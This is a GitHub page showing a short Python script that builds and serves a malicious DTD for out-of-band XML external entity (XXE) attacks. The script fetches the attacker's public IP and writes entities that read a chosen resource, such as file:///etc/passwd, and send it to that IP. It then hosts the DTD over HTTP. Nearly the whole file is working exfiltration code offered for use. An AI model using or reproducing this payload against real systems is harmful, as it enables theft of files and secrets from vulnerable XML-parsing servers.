-
Notifications
You must be signed in to change notification settings - Fork 0
/
http_server.py
26 lines (23 loc) · 883 Bytes
/
http_server.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#!/usr/bin/env python
##################################################
# XXE OOB HTTP Server hosting payload in DTD file
##################################################
from requests import get
import sys, os
def getIpAddress():
ip = get('https://api.ipify.org').text
return ip
if len(sys.argv) > 1:
resource = sys.argv[1]
XXEPayload = '''<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % payload SYSTEM "'''+resource+'''">
<!ENTITY % remote "<!ENTITY % send SYSTEM 'http://'''+getIpAddress()+''':443/x?=%payload;'>
">
%remote;
%send;'''
open("data.dtd", "wb+").write(XXEPayload)
# Serving DTD file on port 80
os.system("python -m SimpleHTTPServer 80")
else:
print 'Usage : HTTPServer.py [protocol]://[host|directory]:[port]/[resource_name] \n\
Ex : python HTTPServer.py file:///etc/passwd\n\t\tpython HTTPServer.py http://127.0.0.1/'